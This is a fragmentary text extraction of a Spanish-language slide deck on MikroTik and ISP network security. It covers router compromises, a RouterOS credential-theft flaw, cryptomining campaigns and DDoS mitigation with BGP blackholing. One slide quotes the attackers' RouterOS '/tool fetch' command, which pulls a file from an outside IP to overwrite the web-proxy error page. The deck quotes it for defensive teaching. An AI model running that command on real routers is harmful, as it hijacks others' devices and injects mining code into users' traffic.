Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Wardner Maia
Director de LACNIC.
http://mdbrasil.com.br http://mikrotikbrasil.com.br
http://mikrotikbrasil.com.br/artigos
©Copyright md brasil - direitos reservados 4
Algunos incidentes de
seguridad recientes
contra redes de acceso
Un Virus Inteligente
Mayo / 2016
©Copyright md brasil - direitos reservados 10
Ataques a clientes de rádio
maio, 2016
CPEs de Deutsche
Telekom invadidas
PDF: https://bit.ly/2DllaQV
….
Here we need to add that we reported this issue to router manufacturer,
and MikroTik has already dealt with this problem. However, our experts
believe that MikroTik not the only brand used by Slingshot actors —
there may be other compromised devices.
Abril, 2018
Obtención, sin
autenticación de los
usuarios y contraseñas
del RouterOS;
Vulnerabilidad
corregida en tiempo
récord en las versiones
6.40.8 y 6.42.1
Agosto, 2018
Los enrutadores no actualizados e invadidos pasan a ser
usados como mineros de crypto monedas
Arquivos: backup.ht1 e
backup.rs1
©Copyright md brasil - direitos reservados 26
¡Invasión con fines de
lucro!
fetch / proxy / user
/tool fetch address=37.233.26.234 src-path=backup.ht1 upload=no user=ftu
mode=ftp password=ftu dst-path="webproxy/error.html"
Arquivo backup.rs1:
script .rsc de configuração do RouterOS
Arquivo backup.ht1:
https://mikrotik.com/download/changelogs/
©Copyright md brasil - direitos reservados 31
¿Cómo esta la situación
después de casi 1 año?
6K+
4K+
10K+
16/11/2018
01/04/2019
https://nvd.nist.gov/vuln/search
©Copyright md brasil - direitos reservados 38
Mas Actualizaciones
https://mikrotik.com/download/changelogs/
©Copyright md brasil - direitos reservados 39
Actualizaciones recientes
(y importantes)
https://medium.com/tenable-
techblog/mikrotik-firewall-nat-
bypass-b8d46398bf24
https://nvd.nist.gov/vuln/search
©Copyright md brasil - direitos reservados 41
IPv6 Issues
(04/04/2019)
Todos que están utilizando IPv6 en sus reds deben actualizar los routers
para una de las versiones abajo:
- 6. 44.2 (stable)
- 6.45beta27 (testing)
https://mikrotik.com/download
https://blog.mikrotik.
com/archive/
https://mikrotik.com/do
wnload/changelogs/long
-term-release-tree
Agosto, 2016
Enero, 2017
abril, 2018
mayo, 2018
julio, 2018
julio, 2018
RFC3514
Network Working Group S. Bellovin
Request for Comments: 3514 AT&T Labs Research
Category: Informational 1 April 2003
….
Abstract
Firewalls, packet filters, intrusion detection systems, and the like often have
difficulty distinguishing between packets that have malicious intent and
those that are merely unusual. We define a security flag in the IPv4 header as
a means of distinguishing the two cases.
Encabezado IP
Flags:
- Reserved (Evil Bit)
- Don’t Fragment
- More fragments follow
RFC3514
2. Syntax
…
0x0 If the bit is set to 0, the packet has no evil intent.
0x1 If the bit is set to 1, the packet has evil intent.
….
There are a number of ways in which the evil bit may be set. Attack
applications may use a suitable API to request that it be set.
Systems that do not have other mechanisms MUST provide such an API;
attack programs MUST use it.
….
Devices such as firewalls MUST drop all inbound packets that have the
evil bit set. Packets with the evil bit off MUST NOT be dropped.
Dropped packets SHOULD be noted in the appropriate MIB variable.
….
Abstract
Firewalls, packet filters, intrusion detection systems, and the like often have
difficulty distinguishing between packets that have malicious intent and those that
are merely unusual. We define a security flag in the IPv4 header as a means of
distinguishing the two cases.
Equipos en ambientes
externos y en dependencias
de clientes
https://mum.mikrotik.com/2014/BR/agenda/EN#0DMTOxO4E9
Equipos en ambientes
externos y en dependencias
de clientes
Equipos en ambientes
externos y en dependencias
de clientes
Mitigación
Equipos en ambientes
externos y en dependencias
de clientes
LCD
https://wiki.mikrotik.com/wiki/Manual:RouterBOARD_settings#Protected_bootloader
MNDP
Deshabilite las interfaces de
descubrimiento siempre que sea
posible para evitar ataques MNDP.
Ataques de “de-autenticación”
Funcionalidad propietaria
Mikrotik que evita ataques
"deauth", inherente al
protocolo 802.11
MUM 2008 - Krakow - Poland
http://mikrotikbrasil.com.br/artigos/Wireless_Security_Poland_2008_Maia.pdf
©Copyright md brasil - direitos reservados 74
Seguridad en la
Capa 2
IP Services
Restringir el acceso a
determinados IPs
IP Firewall
En el canal Input, restringir
el acceso a servicios sólo
para IPs administrativos;
**
“As far as I am aware and from tests I carried out about 7 or 8 years ago the
allowed from IP addresses in IP services menu uses TCP wrappers and
actually allows TCP connections from any address (regardless of what IPs
you specified) the decision to allow or deny a user login is taken after the
connection is made so there could be a window for the exploit to be uploaded.”
- Utilice criptografía;
- Configure interfaces de clientes en modo pasivo;
- Descarte el protocolo 89 en las interfaces externas.
BGP
96
Seguridad por niveles
Traffic Flow
information
Mitigación
Sessiones IBGP
Traffic Flow
information
Mitigación
Fastnetmon
aciona ExaBGP
©Copyright md brasil - direitos reservados 101
Mitigación de DDoS con
Fastnetmon y ExaBGP
Traffic Flow
information
Mitigación
Anuncios iBGP
Traffic Flow
information
Mitigación
Anuncios eBGP
Anuncios iBGP
Internet
ISP X esta sofriendo un ataque
DDoS direccionado para el IP
x.x.x.x/32, causando la
inundación del link;
Upstream
Su proveedor de upstream
Provider (ejemplo AS 100) tiene una
política que pone en blackhole
los anuncios /32 que tenga una
community determinada
(ejemplo 100:666);
ISP X
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Announce your /24
ISP X
ISP X anuncia través de un túnel
el /24 que contiene la(s)
dirección(es) atacadas
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Only “clean” traffic flows
ISP
BGP
BGP
UTRS ISP
BGP
ISP
Internet
BGP
BGP
ISPs establecen sesiones
ISP BGP con Cymru para el
ISP
servicio UTRS
http://www.team-cymru.org/UTRS/
©Copyright md brasil - direitos reservados 111
Cymru - UTRS
ISP
BGP
BGP
UTRS ISP
BGP
ISP
Internet
BGP
BGP
ISPs establecen sesiones
ISP BGP con Cymru para el
ISP
servicio UTRS
http://www.team-cymru.org/UTRS/
©Copyright md brasil - direitos reservados 112
Cymru - UTRS
Content
Providers
ISP
ISP X
ISP
Internet
ISP
ISP
Content
Providers
ISP
UTRS ISP X
ISP
Internet
Blackholing
Route Server
(ExaBGP)
Logs
Syslogd DNS
123
Seguridad por niveles
Filtro uRPF
NAT
RFC 6092
Seguridad para CPEs IPv6
¿Es tiempo de
relajarse?
http://www.shrubbery.net/rancid/
https://telegram.org/
Forward Channel
/ipv6 firewall filter
Forward Channel
/ipv6 firewall filter
Input Channel
/ipv6 firewall filter
maia@mdbrasil.com.br